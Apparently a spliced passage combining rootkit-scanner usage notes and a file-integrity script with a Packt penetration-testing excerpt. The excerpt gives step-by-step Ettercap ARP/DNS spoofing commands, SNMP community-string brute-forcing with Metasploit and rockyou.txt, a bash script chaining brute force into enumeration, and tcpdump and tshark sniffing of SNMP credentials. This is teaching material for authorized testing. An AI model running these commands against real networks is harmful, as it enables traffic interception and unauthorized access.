2. At the end of the process, you will receive a summary listing the checks performed and their statistics.

Useful alternative command options for chkrootkit

The following is a list of useful options to select when running chkrootkit:

- -h: Displays the help file
- -V: Displays the current running version of chkrootkit
- -l: Displays a list of available tests

Useful alternative command options for rkhunter

The following is a list of useful options to select when running rkhunter:

- --update: Allows you to update the rkhunter database:
  rkhunter --update
- --list: Displays a list of Perl modules, rootkits available for checking, and tests that will be performed:
  rkhunter --list
- --sk: Allows you to skip pressing the Enter key after each test runs:
  rkhunter --check --sk

Entering rkhunter at a terminal window will display the help file:

rkhunter
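Scanners such as chkrootkit and rkhunter rely heavily on comparing the current state of a system against known-good properties. The heart of that idea is file integrity checking, which you can prototype in a few lines of Python (a toy baseline for illustration, not a substitute for the real scanners; run it once to record the baseline and again later to compare):

    import hashlib
    import json
    import os
    import sys

    def snapshot(directory):
        # Map each regular file to its SHA-256 digest.
        digests = {}
        for dirpath, _dirs, files in os.walk(directory):
            for name in files:
                path = os.path.join(dirpath, name)
                if os.path.isfile(path):
                    with open(path, "rb") as f:
                        digests[path] = hashlib.sha256(f.read()).hexdigest()
        return digests

    BASELINE = "baseline.json"
    current = snapshot("/bin")
    if not os.path.exists(BASELINE):
        with open(BASELINE, "w") as f:
            json.dump(current, f)
        sys.exit("Baseline recorded; rerun later to compare")

    with open(BASELINE) as f:
        baseline = json.load(f)
    for path, digest in sorted(current.items()):
        if baseline.get(path) != digest:
            print(f"CHANGED OR NEW: {path}")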
Network Exploitation and Monitoring

Packt
22 May 2014
(For more resources related to this topic, see here.)

Man-in-the-middle attacks

Using ARP abuse, we can perform more elaborate man-in-the-middle (MITM)-style attacks, building on the ability to abuse address resolution and host identification schemes. This section will focus on the methods you can use to do just that.

MITM attacks are aimed at fooling two entities on a given network into communicating via the proxy of an unauthorized third party, or allowing a third party to access information in transit between two entities on a network. For instance, when a victim connects to a service on the local network or on a remote network, a man-in-the-middle attack gives you, as an attacker, the ability to eavesdrop on or even augment the communication happening between the victim and its service. By service, we could mean a web (HTTP), FTP, or RDP service, or really anything that doesn't have the inherent means to defend itself against MITM attacks, which turns out to be quite a lot of the services we use today!

Ettercap DNS spoofing

Ettercap is a tool that provides a simple command-line and graphical interface for performing MITM attacks using a variety of techniques. In this section, we will focus on applications of ARP spoofing attacks, namely DNS spoofing. You can set up a DNS spoofing attack with ettercap by performing the following steps:

1. Before we get ettercap up and running, we need to modify the file that holds the DNS records for our soon-to-be-spoofed DNS server. This file is found under /usr/share/ettercap/etter.dns. You need to either add DNS names and IP addresses or modify the ones currently in the file, replacing all the IPs with yours if you'd like to act as the intercepting host.
2. Now that our DNS server records are set up, we can invoke ettercap. Invoking ettercap is pretty straightforward; here's the usage specification:
ettercap [OPTIONS] [TARGET1] [TARGET2]
3. To perform a MITM attack using ettercap, you need to supply the -M switch and pass it an argument indicating the MITM method you'd like to use. In addition, you will also need to specify that you'd like to use the DNS spoofing plugin. Here's what the invocation will look like:
ettercap -M arp:remote -P dns_spoof [TARGET1] [TARGET2]
Here, TARGET1 and TARGET2 are the host you want to intercept and either the default gateway or the DNS server, interchangeably. To target the host at address 192.168.10.107 with a default gateway of 192.168.10.1, you will invoke the following command:
ettercap -M arp:remote -P dns_spoof /192.168.10.107//192.168.10.1/

Once launched, ettercap will begin poisoning the ARP tables of the specified hosts and listening for any DNS requests to the domains it's configured to resolve.
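For reference, records in etter.dns follow a simple zone-file-like syntax. A sketch of what you might add, where the domain and IP address are purely illustrative, could look like this:

# redirect lookups for example.com (and its subdomains) to the attacker
example.com      A   192.168.10.99
*.example.com    A   192.168.10.99
www.example.com  PTR 192.168.10.99   # answer reverse lookups as well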
Interrogating servers

For any network device to participate in communication, certain information needs to be accessible to it; no device will be able to look up a domain name or find an IP address without the participation of devices in charge of that information. In this section, we will detail some techniques you can use to interrogate common network components for sensitive information about your target network and the hosts on it.

SNMP interrogation

The Simple Network Management Protocol (SNMP) is used by routers and other network components to support remote monitoring of things such as bandwidth, CPU/memory usage, hard disk space usage, logged-on users, running processes, and a number of other incredibly sensitive collections of information. Naturally, any penetration tester with an exposed SNMP service on their target network will need to know how to extract any potentially useful information from it.

About SNMP security

SNMP services before Version 3 are not designed with security in mind. Authentication to these services often comes in the form of a simple string of characters called a community string. Another common implementation flaw inherent to SNMP Version 1 and 2 is that they offer no protection against brute-forcing community strings or eavesdropping on communication.

To enumerate SNMP servers for information using the Kali Linux tools, you can resort to a number of techniques. The most obvious one is snmpwalk, and you can use it with the following command:

snmpwalk -v [1 | 2c | 3] -c [community string] [target host]

For example, let's say we were targeting 192.168.10.103 with a community string of public, which is a common community string setting; you would then invoke the following command to get information from the SNMP service:

snmpwalk -v 1 -c public 192.168.10.103

Here, we opted to use SNMP Version 1, hence the -v 1 in the invocation of the preceding command. The output will look something like the following screenshot:

As you can see, this actually extracts some pretty detailed information about the targeted host. Whether this is a critical vulnerability or not will depend on which kind of information is exposed. On Microsoft Windows machines and some popular router operating systems, SNMP services could expose user credentials and even allow remote attackers to augment them maliciously, should they have write access to the SNMP database.

Exploiting SNMP successfully often depends strongly on the device implementing the service. You could imagine that for routers, your target will probably be the routing table or the user accounts on the device. For other host types, the attack surface may be quite different. Try to assess the risk of SNMP-based flaws and information leaks with respect to the host and possibly the wider network it's hosted on. Don't forget that SNMP is all about sharing information, information that other hosts on your network probably trust. Think about the kind of information accessible and what you will be able to do with it should you have the ability to influence it. If you can attack the host, attack the hosts that trust it.

Another collection of tools is really great at collecting information from SNMP services: the snmp_enum, snmp_login, and similar scripts available in the Metasploit Framework. The snmp_enum script does pretty much exactly what snmpwalk does, except that it structures the extracted information in a friendlier format, which makes it easier to understand. Here's an example:

msfcli auxiliary/scanner/snmp/snmp_enum [OPTIONS] [MODE]

The options available for this module are shown in the following screenshot:

Here's an example invocation against the host in our running example:

msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=192.168.10.103

The preceding command produces the following output:

You will notice that we didn't specify the community string in the invocation. This is because the module assumes a default of public. You can specify a different one using the COMMUNITY parameter. In other situations, you may not always be lucky enough to know the community string in advance. However, luckily, SNMP Version 1, 2, and 2c do not inherently have any protection against brute-force attacks, nor do they use any form of network-based encryption.
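If a full walk is too noisy or too slow, one refinement is to point snmpwalk at specific subtrees. The OIDs below are standard MIB-2 locations; the target address and community string are the assumed values from our running example:

# query only the system subtree (sysDescr, sysUpTime, sysName, and so on)
snmpwalk -v 1 -c public 192.168.10.103 1.3.6.1.2.1.1

# enumerate running process names (hrSWRunName) on hosts that expose
# the Host Resources MIB, such as Windows machines
snmpwalk -v 1 -c public 192.168.10.103 1.3.6.1.2.1.25.4.2.1.2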
In the case of SNMP Version 1 and 2c, you can use a nifty Metasploit module called snmp_login that runs through a list of possible community strings and determines the level of access the enumerated strings give you. You can use it by running the following command:

msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=192.168.10.103

The preceding command produces the following output:

As seen in the preceding screenshot, once the run is complete, it lists the enumerated strings along with the level of access they grant. The snmp_login module uses a static list of possible strings to do its enumeration by default, but you can also run this module against some of the password lists that ship with Kali Linux, as follows:

msfcli auxiliary/scanner/snmp/snmp_login PASS_FILE=/usr/share/wordlists/rockyou.txt RHOSTS=192.168.10.103

This will use the rockyou.txt wordlist to look for strings to guess with. Because all of these Metasploit modules are command line-driven, you can of course combine them. For instance, if you'd like to brute-force a host for SNMP community strings and then run the enumeration module on the strings it finds, you can do this by crafting a bash script such as the following:

#!/bin/bash
if [ $# != 1 ]
then
  echo "USAGE: . snmp.sh [HOST]"
  exit 1
fi
TARGET=$1
echo "[*] Running SNMP enumeration on '$TARGET'"
# pull each discovered community string out of snmp_login's output
for comm_string in `msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=$TARGET E 2> /dev/null | awk -F"'" '/access with community/ { print $2 }'`
do
  echo "[*] found community string '$comm_string' ...running enumeration"
  msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=$TARGET COMMUNITY=$comm_string E 2> /dev/null
done

The following command shows you how to use it:

. snmp.sh [TARGET]

In our running example, it is used as follows:

. snmp.sh 192.168.10.103

Other than guessing or brute-forcing SNMP community strings, you can also use TCPDump to filter out any packets that could contain unencrypted SNMP authentication information. Here's a useful example:

tcpdump udp port 161 -i eth0 -vvv -A

The preceding command will produce the following output:

Without going too much into detail about the SNMP packet structure, it's usually pretty easy to spot the community string by looking through the printable strings captured. You may also want to look at building a more comprehensive packet-capturing tool using something such as Scapy, which is available in Kali Linux.
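As a refinement of the TCPDump approach, and assuming tshark (Wireshark's command-line companion) is installed on your system, you can ask it to decode SNMP and print only the community string field rather than eyeballing the ASCII dump:

# print just the community string from live SNMP traffic
tshark -i eth0 -f "udp port 161" -T fields -e snmp.community

The same field-extraction idea carries over to a Scapy script if you need richer per-packet logic.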